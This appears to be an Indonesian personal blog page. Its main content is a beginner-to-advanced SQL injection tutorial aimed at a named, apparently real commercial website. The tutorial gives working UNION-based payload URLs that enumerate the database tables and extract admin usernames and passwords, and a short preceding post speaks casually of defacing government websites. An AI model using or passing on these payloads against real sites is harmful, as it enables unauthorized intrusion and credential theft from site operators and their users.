Cinta oh Cinta, kayak apa sih bentuknya, warnanya, baunya, kalo rasanya mah tiap hari bakal berbeda-beda, ada yang ngeblog sebagai media curhat, ada puisi puisi indah disana, ada juga facebook sebagai situs jaringan sosial dan microbloging yang dengan sangat gampang merubah-rubah status yang penuh kata-kata cinta hingga teman-temannya akan pura-pura kasih komentar dari yang basa-basi hingga yang tulus, yang lebih pinter kalo lagi patah hati ada aja pelampiasan, website resmi sebuah pemerintahan juga dideface dan dimasukin puisi-puisi berharap akan ada yang mendengar jeritan tangisan hatinya. dan memang begitulah adanya. (more…)
Tulisan menyangkut ‘sql injection’
Internet sebagai pelampiasan Cinta
Wednesday, June 3rd, 2009SQL Injection Database Website
Saturday, December 20th, 2008
Level : Pemula-Mahir
oke kali ini saya mo ngasih tutorial tentang sql injection
target = http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27
oke kita mulai aja
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 –> Normal page
kita test
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27? –> Error hehe
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27%20order%20by%201/* –> test column
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27%20order%20by%2013/* –> column ke 13 error => berarti g ad
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12/* –> column yang terbuka 2 dan 4
test version mysql
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20all%20select%201,2,3,version(),5,6,7,8,9,10,11,12/* –> pake’ mysql versi 5 hehe bisa d schema ni
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20all%20select%201,2,3,table_name,5,6,7,8,9,10,11,12%20from%20information_schema.tables/* –> table dah muncul semua
ambil yang penting aja (admin)
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20all%20select%201,2,3,concat(username,0×3a,password),5,6,7,8,9,10,11,12%20from%20users/* –> gak mau d extrak ni oke deh
cara kedua unhex(hex())
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20all%20select%201,2,3,unhex(hex(concat(username,0×3a,password))),5,6,7,8,9,10,11,12%20from%20users/* –> username sama password udah ketemu
Selesai, be nice hacker bro….
Catatan Kurang kerjaan seorang Pengelana Nasib, nasib apes sama mujur yang kadang kagak penting gue catet disini, Kalo pengen ikutan bersaksi Gue raja apes apa raja mujur, Yuuk mari berhitung postingan gue...!!! 
